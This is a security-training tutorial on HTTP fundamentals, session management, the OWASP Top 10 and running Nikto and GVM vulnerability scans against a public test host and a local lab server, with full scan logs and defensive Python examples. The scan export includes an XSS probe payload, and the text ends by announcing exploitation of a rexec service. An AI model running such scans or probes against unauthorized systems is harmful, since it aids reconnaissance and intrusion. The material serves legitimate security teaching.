Introduction
This article is a follow-up to the previous installment and covers vulnerability assessment and hands-on exercises for web applications.
What this article gives you
- The basic structure of HTTP/HTTPS and the flow of a transaction
- Web application vulnerabilities and the OWASP Top 10
- Hands-on vulnerability scanning and verification methods
- Building your own web application lab and understanding typical design flaws
⚠️ Warning (must read)
Misusing the content covered in this article carries serious legal risk.
Carry out these exercises only in authorized training or test environments.
Attacks against real organizations or individuals are prohibited.
About this chapter
Chapter 6 explains the exploitation of application-based vulnerabilities;
because the material is extensive, it is split across several articles.
The structure of Chapter 6 as a whole is as follows.
- 6.1. Overview of web application attacks and the OWASP Top 10 👈 this article
- 6.2. Building your own web application lab 👈 this article
- 6.3. Understanding business logic flaws 👈 this article
- 6.4. Understanding injection-based vulnerabilities
- 6.5. Exploiting authentication-based vulnerabilities
- 6.6. Exploiting authorization-based vulnerabilities
- 6.7. Understanding cross-site scripting (XSS) vulnerabilities
- 6.8. Overview of cross-site request forgery (CSRF/XSRF) and server-side request forgery attacks
- 6.9. Overview of clickjacking
- 6.10. Exploiting security misconfigurations
- 6.11. Exploiting file inclusion vulnerabilities
- 6.12. Exploiting insecure code
6.1 Overview of Web Application Attacks and the OWASP Top 10
● HTTP/HTTPS protocol fundamentals
HTTP is a stateless application-level protocol built on a request/response model.
- Client: browsers, API clients, custom HTTP programs
- Server: web servers (e.g. Apache, Nginx)
- Characteristics: simple and easy to understand, but because it is stateless, the application itself has to handle session management
Flow of an HTTP transaction:
1. TCP three-way handshake
2. The client sends an HTTP GET or POST request
3. The server returns an HTTP response (e.g. 200 OK)
Common HTTP methods:
| Method | Description |
|---|---|
| GET | Retrieve a resource |
| POST | Submit data |
| PUT | Update a resource |
| DELETE | Delete a resource |
| OPTIONS | List the methods the server supports |
| CONNECT | Ask an HTTP proxy to open a TCP tunnel to an arbitrary host |
Elements of an HTTP request include:
- HTTP method
- URI and path to the resource: the path portion of the requested URL
- Request version number: the HTTP version the client is using
- User agent: information about the client software, such as the browser, that the user is running
and others.
Example URL structure:
https://theartofhacking.org:8123/dir/test;id=89?name=omar&x=true
- Scheme: https
- Host: theartofhacking.org
- Port: 8123
- Path: /dir/test
- Path parameter: id=89
- Query string: name=omar&x=true
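The breakdown above can be reproduced with Python's standard library. The following is an added example, not code from the original article: it splits the example URL into the components listed, fills in the scheme default when no port is given, and adds a same-origin comparison, which is the check browsers use when deciding whether two URLs may share cookies. `DEFAULT_PORTS`, `url_components` and `same_origin` are names chosen for this example.

```python
# Added example (not from the original article): split the article's example URL
# into its components with the standard library and compare origins.
from urllib.parse import urlparse, parse_qs

DEFAULT_PORTS = {"http": 80, "https": 443}

EXAMPLE_URL = "https://theartofhacking.org:8123/dir/test;id=89?name=omar&x=true"


def url_components(url: str) -> dict:
    """Return the parts of a URL under the names the article uses.

    urlparse() (unlike urlsplit()) peels the ';id=89' path parameter off the
    last path segment, which is why it appears separately from the path here.
    """
    p = urlparse(url)
    return {
        "scheme": p.scheme,
        "host": p.hostname,                              # host only, lower-cased, no port
        "port": p.port or DEFAULT_PORTS.get(p.scheme),   # explicit port, else the scheme default
        "path": p.path,
        "path_params": p.params,                         # 'id=89'
        "query": p.query,                                # raw query string
        "query_dict": parse_qs(p.query),                 # {'name': ['omar'], 'x': ['true']}
    }


def same_origin(url_a: str, url_b: str) -> bool:
    """Browsers compare scheme, host and effective port to decide whether two
    URLs share an origin; path, path parameters and query play no part."""
    a, b = url_components(url_a), url_components(url_b)
    return (a["scheme"], a["host"], a["port"]) == (b["scheme"], b["host"], b["port"])


if __name__ == "__main__":
    for key, value in url_components(EXAMPLE_URL).items():
        print(f"{key:12} {value}")
    print("same origin as https://theartofhacking.org/ :", same_origin(EXAMPLE_URL, "https://theartofhacking.org/"))
```

Note that the explicit port 8123 makes the example URL a different origin from `https://theartofhacking.org/`, even though the host is identical.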
● Web sessions and session management
A web session maintains a user's state across a series of HTTP requests and responses.
- Role of the session ID: after authentication it is an identifier as sensitive as a password
  - Recommended: a session ID with at least 128 bits, and preferably 256 bits, of entropy
- Session management mechanisms: cookies (recommended)*, URL parameters (not recommended), hidden form fields
  * Cookies come in two kinds, persistent cookies and non-persistent (session) cookies; management via session cookies is recommended
- Other recommendations for session management:
  - Encryption with TLS
  - Use of an existing framework
  - Thorough validation of session IDs
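The recommendations above fit together in a small server-side session layer. The following is an added example, not code from the original article or from any framework: it issues a 256-bit session ID from the OS CSPRNG, hands it out as a non-persistent cookie (no Max-Age or Expires) with the Secure, HttpOnly and SameSite attributes, validates the ID's shape before any lookup, and rotates the ID at login. The cookie name `SID`, the `SessionStore` class and the in-memory dict are assumptions made for this example.

```python
# Added example (not from the original article): 256-bit session IDs, a
# non-persistent session cookie, and validation/rotation on the server side.
import secrets
from typing import Optional

SESSION_ID_BYTES = 32                      # 256 bits of entropy, the size the article prefers
SESSION_ID_HEX_LEN = SESSION_ID_BYTES * 2  # hex encoding: two characters per byte
HEX_DIGITS = frozenset("0123456789abcdef")


def new_session_id() -> str:
    """Session IDs come from the OS CSPRNG; never derive them from time or user data."""
    return secrets.token_hex(SESSION_ID_BYTES)


def session_cookie_header(session_id: str, name: str = "SID") -> str:
    """Set-Cookie line for a non-persistent (session) cookie.

    No Max-Age or Expires, so the browser drops it when the session ends.
    Secure keeps it on TLS, HttpOnly hides it from page scripts, and
    SameSite=Lax stops most cross-site requests from carrying it.
    """
    return f"Set-Cookie: {name}={session_id}; Path=/; Secure; HttpOnly; SameSite=Lax"


def is_well_formed_session_id(candidate: str) -> bool:
    """Cheap syntactic check before any store lookup: exactly 64 lowercase hex chars."""
    return len(candidate) == SESSION_ID_HEX_LEN and set(candidate) <= HEX_DIGITS


class SessionStore:
    """Server-side session state; the cookie carries only the random key."""

    def __init__(self) -> None:
        self._sessions = {}

    def create(self, user: str) -> str:
        sid = new_session_id()
        self._sessions[sid] = {"user": user}
        return sid

    def lookup(self, candidate: str) -> Optional[dict]:
        """Reject malformed IDs outright; unknown well-formed IDs simply miss."""
        if not is_well_formed_session_id(candidate):
            return None
        return self._sessions.get(candidate)

    def rotate(self, old_sid: str) -> Optional[str]:
        """Issue a fresh ID for an existing session. Do this at login so an ID
        that existed before authentication never becomes an authenticated one."""
        data = self.lookup(old_sid)
        if data is None:
            return None
        del self._sessions[old_sid]
        new_sid = new_session_id()
        self._sessions[new_sid] = data
        return new_sid

    def destroy(self, sid: str) -> None:
        """Logout: forget the session server-side; expiring the cookie alone is not enough."""
        self._sessions.pop(sid, None)


if __name__ == "__main__":
    store = SessionStore()
    sid = store.create("alice")
    print(session_cookie_header(sid))
    print("lookup:", store.lookup(sid))
    print("malformed:", store.lookup("1234"))
```

Keeping the state in the store and only the random key in the cookie is what makes the entropy requirement meaningful: an attacker who cannot guess the 256-bit key has nothing else to work with.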
● OWASP Top 10
The ten most critical web application vulnerabilities, published by OWASP (Open Web Application Security Project).
Latest information: OWASP Top 10
The 2025 Top 10
- Broken Access Control
- Security Misconfiguration
- Software Supply Chain Failures
- Cryptographic Failures
- Injection
- Insecure Design
- Authentication Failures
- Software or Data Integrity Failures
- Logging and Alerting Failures
- Mishandling of Exceptional Conditions
Hands-on exercise: scanning a website for vulnerabilities
Using Nikto, a web scanner that detects vulnerabilities such as XSS, we learn how to run a scan
and how to read its results.
Starting Nikto and scanning the test site
Start Nikto from the application menu or the command line and run a scan against Nmap's public test site.
Note: the scan was interrupted because a full run takes a long time.
Screenshot of the Nmap public test site (scanme.nmap.org)

┌──(kali㉿Kali)-[~]
└─$ nikto -h scanme.nmap.org
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Multiple IPs found: 45.33.32.156, 2600:3c01::f03c:91ff:fe18:bb2f
+ Target IP: 45.33.32.156
+ Target Hostname: scanme.nmap.org
+ Target Port: 80
+ Start Time: 2025-11-08 12:13:25 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /index: Uncommon header 'tcn' found, with contents: list.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.html. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .
^C
Taking one of the detected findings as an example, we can see that the X-Content-Type-Options header is not set.
This is a weakness in which the browser may misidentify the MIME type of a response, which can be abused.
The countermeasures are to set Content-Type correctly on responses, or to disable MIME sniffing with "X-Content-Type-Options: nosniff".
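The two header findings Nikto reported above can be reproduced locally against any raw HTTP response. The following is an added example, not code from the article or from Nikto: it parses a response head, reports the missing or mis-set headers, and shows a response that carries the recommended values. The two sample responses are constructed here, and `EXPECTED` and `security_header_findings` are names chosen for this example.

```python
# Added example (not from the original article or from Nikto): check a raw HTTP
# response for the X-Content-Type-Options and X-Frame-Options findings above.

EXPECTED = {
    # header name (lower-cased) -> accepted values (lower-cased)
    "x-content-type-options": {"nosniff"},
    "x-frame-options": {"deny", "sameorigin"},
}


def parse_response(raw: str):
    """Split a raw HTTP/1.1 response into (status line, headers dict).
    Header names are lower-cased because HTTP header names are case-insensitive."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def security_header_findings(raw: str) -> list:
    """One message per header that is absent or set to an unexpected value."""
    _, headers = parse_response(raw)
    findings = []
    for name, allowed in EXPECTED.items():
        value = headers.get(name)
        if value is None:
            findings.append(f"{name}: header is not present")
        elif value.lower() not in allowed:
            findings.append(f"{name}: unexpected value {value!r}")
    return findings


# Constructed sample responses (not captured from any real host).
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html>...</html>"
)
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"   # explicit, correct type on every response
    "X-Content-Type-Options: nosniff\r\n"          # browser must not second-guess it
    "X-Frame-Options: DENY\r\n"                    # the anti-clickjacking header Nikto also flagged
    "\r\n"
    "<html>...</html>"
)

if __name__ == "__main__":
    for label, raw in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, security_header_findings(raw) or "no findings")
```

In Apache the hardened form corresponds to `Header always set X-Content-Type-Options "nosniff"` and `Header always set X-Frame-Options "DENY"` in the server or virtual host configuration; re-running Nikto afterwards is the quickest way to confirm the two findings have gone.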
Scanning several servers at once
Here we scan several hosts on the local virtual network in one run.
To scan several hosts at once, prepare a text file listing the targets (DNS lookups can help build it) and pass it to Nikto with the '-h' option.
Checking CVEs and investigating the details
Scanning the local web server at 172.17.0.2 revealed
CVE-1999-0678 and CVE-2003-1418, so we look into their details.
Execution log:
---------------------------------------------------------------------------
+ Target IP: 172.17.0.2
+ Target Hostname: 172.17.0.2
+ Target Port: 80
+ Start Time: 2025-11-08 12:26:51 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) DAV/2
+ /: Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.10.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /index: Uncommon header 'tcn' found, with contents: list.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.php. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ /phpinfo.php: Output from the phpinfo() function was found.
+ /doc/: Directory indexing found.
+ /doc/: The /doc/ directory is browsable. This may be /usr/doc. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0678
+ /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /phpMyAdmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ /phpMyAdmin/ChangeLog: Server may leak inodes via ETags, header found with file /phpMyAdmin/ChangeLog, inode: 1115138, size: 40540, mtime: Tue Dec 9 17:24:00 2008. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ /test/: Directory indexing found.
+ /test/: This might be interesting.
+ /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. See: CWE-552
+ /icons/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /phpMyAdmin/: phpMyAdmin directory found.
+ /phpMyAdmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ /phpMyAdmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. See: https://typo3.org/
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8917 requests: 0 error(s) and 27 item(s) reported on remote host
+ End Time: 2025-11-08 12:27:10 (GMT0) (19 seconds)
Looking up the details on NIST NVD (https://nvd.nist.gov/) shows:
- CVE-1999-0678: Apache's default configuration exposes /usr/doc, so documentation stored on the server can be browsed
- CVE-2003-1418: the inode in the ETag header and the child process ID in multipart MIME boundaries can be disclosed
Exporting Nikto results
Nikto can write its scan results in HTML, CSV or TXT format.
Below are the commands for html and csv output.
- html
Execution log:
┌──(kali㉿Kali)-[~]
└─$ nikto -h 172.17.0.2 -o scan_results.htm
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 172.17.0.2
+ Target Hostname: 172.17.0.2
+ Target Port: 80
+ Start Time: 2025-11-08 12:42:36 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) DAV/2
+ /: Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.10.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /index: Uncommon header 'tcn' found, with contents: list.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.php. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ /phpinfo.php: Output from the phpinfo() function was found.
+ /doc/: Directory indexing found.
+ /doc/: The /doc/ directory is browsable. This may be /usr/doc. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0678
+ /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /phpMyAdmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ /phpMyAdmin/ChangeLog: Server may leak inodes via ETags, header found with file /phpMyAdmin/ChangeLog, inode: 1115138, size: 40540, mtime: Tue Dec 9 17:24:00 2008. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ /test/: Directory indexing found.
+ /test/: This might be interesting.
+ /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. See: CWE-552
+ /icons/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /phpMyAdmin/: phpMyAdmin directory found.
+ /phpMyAdmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ /phpMyAdmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. See: https://typo3.org/
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8910 requests: 0 error(s) and 27 item(s) reported on remote host
+ End Time: 2025-11-08 12:42:54 (GMT0) (18 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
- csv
┌──(kali㉿Kali)-[~]
└─$ cat scan_results.txt
"Nikto - v2.5.0/"
"172.17.0.2","172.17.0.2","80","","","","Apache/2.2.8 (Ubuntu) DAV/2"
"172.17.0.2","172.17.0.2","80","","GET","/","Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.10."
"172.17.0.2","172.17.0.2","80","https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options","GET","/","The anti-clickjacking X-Frame-Options header is not present."
"172.17.0.2","172.17.0.2","80","https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/","GET","/","The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type."
"172.17.0.2","172.17.0.2","80","","GET","/index","Uncommon header 'tcn' found, with contents: list."
"172.17.0.2","172.17.0.2","80","http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275","GET","/index","Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.php."
"172.17.0.2","172.17.0.2","80","","HEAD","/","Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch."
"172.17.0.2","172.17.0.2","80","","ARPIYMWU","/","Web Server returns a valid response with junk HTTP methods which may cause false positives."
"172.17.0.2","172.17.0.2","80","https://owasp.org/www-community/attacks/Cross_Site_Tracing","TRACE","/","HTTP TRACE method is active which suggests the host is vulnerable to XST."
"172.17.0.2","172.17.0.2","80","","GET","/phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>","/phpinfo.php: Output from the phpinfo() function was found."
"172.17.0.2","172.17.0.2","80","","GET","/doc/","Directory indexing found."
"172.17.0.2","172.17.0.2","80","CVE-1999-0678","GET","/doc/","The /doc/ directory is browsable. This may be /usr/doc."
"172.17.0.2","172.17.0.2","80","OSVDB-12184","GET","/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000","PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings."
"172.17.0.2","172.17.0.2","80","OSVDB-12184","GET","/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42","PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings."
"172.17.0.2","172.17.0.2","80","OSVDB-12184","GET","/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42","PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings."
"172.17.0.2","172.17.0.2","80","OSVDB-12184","GET","/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42","PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings."
"172.17.0.2","172.17.0.2","80","","GET","/phpMyAdmin/changelog.php","phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts."
"172.17.0.2","172.17.0.2","80","CVE-2003-1418","GET","/phpMyAdmin/ChangeLog","Server may leak inodes via ETags, header found with file /phpMyAdmin/ChangeLog, inode: 1115138, size: 40540, mtime: Tue Dec 9 17:24:00 2008."
"172.17.0.2","172.17.0.2","80","","GET","/phpMyAdmin/ChangeLog","phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts."
"172.17.0.2","172.17.0.2","80","","GET","/test/","Directory indexing found."
"172.17.0.2","172.17.0.2","80","","GET","/test/","This might be interesting."
"172.17.0.2","172.17.0.2","80","CWE-552","GET","/phpinfo.php","PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information."
"172.17.0.2","172.17.0.2","80","","GET","/icons/","Directory indexing found."
"172.17.0.2","172.17.0.2","80","https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/","GET","/icons/README","Apache default file found."
"172.17.0.2","172.17.0.2","80","","GET","/phpMyAdmin/","phpMyAdmin directory found."
"172.17.0.2","172.17.0.2","80","","GET","/phpMyAdmin/Documentation.html","phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts."
"172.17.0.2","172.17.0.2","80","https://typo3.org/","GET","/phpMyAdmin/README","phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts."
"172.17.0.2","172.17.0.2","80","","GET","/#wp-config.php#","#wp-config.php# file found. This file contains the credentials."
Execution log:
┌──(kali㉿Kali)-[~]
└─$ nikto -h 172.17.0.2 -o scan_results.txt -Format csv
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 172.17.0.2
+ Target Hostname: 172.17.0.2
+ Target Port: 80
+ Start Time: 2025-11-08 12:43:12 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) DAV/2
+ /: Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.10.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /index: Uncommon header 'tcn' found, with contents: list.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.php. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ /phpinfo.php: Output from the phpinfo() function was found.
+ /doc/: Directory indexing found.
+ /doc/: The /doc/ directory is browsable. This may be /usr/doc. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0678
+ /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /phpMyAdmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ /phpMyAdmin/ChangeLog: Server may leak inodes via ETags, header found with file /phpMyAdmin/ChangeLog, inode: 1115138, size: 40540, mtime: Tue Dec 9 17:24:00 2008. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ /test/: Directory indexing found.
+ /test/: This might be interesting.
+ /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. See: CWE-552
+ /icons/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /phpMyAdmin/: phpMyAdmin directory found.
+ /phpMyAdmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ /phpMyAdmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. See: https://typo3.org/
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8910 requests: 0 error(s) and 27 item(s) reported on remote host
+ End Time: 2025-11-08 12:43:28 (GMT0) (16 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
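The CSV export is the format to reach for when results have to be post-processed, for example to pull out every finding that carries a CVE so it can be looked up on NVD as in the previous section. The following is an added example, not code from the article or from Nikto: it parses a handful of rows copied from the scan_results.txt output shown above, skips the one-field banner line, and summarizes the findings. The seven-column layout (host, IP, port, reference, method, path, message) is inferred from those rows; `parse_nikto_csv` and the other function names are chosen for this example.

```python
# Added example (not from the original article or from Nikto): parse Nikto's CSV
# export and summarize it. Rows below are copied from the scan output above.
import csv
import io
from collections import Counter

FIELDS = ("host", "ip", "port", "reference", "method", "path", "message")

# Subset of the scan_results.txt rows shown above (same host, same findings).
NIKTO_CSV = '''"Nikto - v2.5.0/"
"172.17.0.2","172.17.0.2","80","","","","Apache/2.2.8 (Ubuntu) DAV/2"
"172.17.0.2","172.17.0.2","80","https://owasp.org/www-community/attacks/Cross_Site_Tracing","TRACE","/","HTTP TRACE method is active which suggests the host is vulnerable to XST."
"172.17.0.2","172.17.0.2","80","CVE-1999-0678","GET","/doc/","The /doc/ directory is browsable. This may be /usr/doc."
"172.17.0.2","172.17.0.2","80","CVE-2003-1418","GET","/phpMyAdmin/ChangeLog","Server may leak inodes via ETags, header found with file /phpMyAdmin/ChangeLog, inode: 1115138, size: 40540, mtime: Tue Dec 9 17:24:00 2008."
"172.17.0.2","172.17.0.2","80","CWE-552","GET","/phpinfo.php","PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information."
"172.17.0.2","172.17.0.2","80","","GET","/#wp-config.php#","#wp-config.php# file found. This file contains the credentials."
'''


def parse_nikto_csv(text: str) -> list:
    """Return one dict per finding; lines without all seven fields (the banner) are skipped."""
    findings = []
    for row in csv.reader(io.StringIO(text)):
        if len(row) != len(FIELDS):
            continue
        findings.append(dict(zip(FIELDS, row)))
    return findings


def server_banner(findings: list):
    """The row with no method and no path carries the Server header value."""
    for f in findings:
        if f["method"] == "" and f["path"] == "":
            return f["message"]
    return None


def cve_references(findings: list) -> list:
    """Sorted, de-duplicated CVE IDs from the reference column, ready for an NVD lookup."""
    return sorted({f["reference"] for f in findings if f["reference"].startswith("CVE-")})


def count_by_method(findings: list) -> Counter:
    """How many findings were produced by each HTTP method (TRACE stands out)."""
    return Counter(f["method"] for f in findings if f["method"])


def findings_for_path(findings: list, path: str) -> list:
    """All messages Nikto attached to one path."""
    return [f["message"] for f in findings if f["path"] == path]


if __name__ == "__main__":
    found = parse_nikto_csv(NIKTO_CSV)
    print("server:", server_banner(found))
    print("CVEs to look up:", cve_references(found))
    print("findings per method:", dict(count_by_method(found)))
    print("/doc/:", findings_for_path(found, "/doc/"))
```

Reading the real file is a one-line change: `parse_nikto_csv(open("scan_results.txt", encoding="utf-8").read())`. Because the reference column mixes CVE IDs, OSVDB IDs, CWE IDs and plain URLs, filtering on the `CVE-` prefix is what keeps the NVD lookup list clean.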
Reference: vulnerability scanners other than Nikto
- Commercial (paid)
  - Invicti / Netsparker
  - Acunetix
- Open source
  - OWASP ZAP
  - w3af
- Specialized tools
  - sqlmap: specialized in SQL injection
  - WPScan: specialized in WordPress
Hands-on exercise: using the GVM vulnerability scanner
In this exercise we run a vulnerability scan against the vulnerable host (172.17.0.2)
and exploit a vulnerability it finds.
The procedure for running a GVM scan was covered earlier, so refer to that article.
Running the scan in GVM
Select the advanced task wizard, point it at the vulnerable host, name the task "Metasploitable" and run it.
Note: the scan takes considerable time, more than 30 minutes.
Reviewing the scan results
Of the several vulnerabilities found, we exploit the one reported as "rexec service is running".
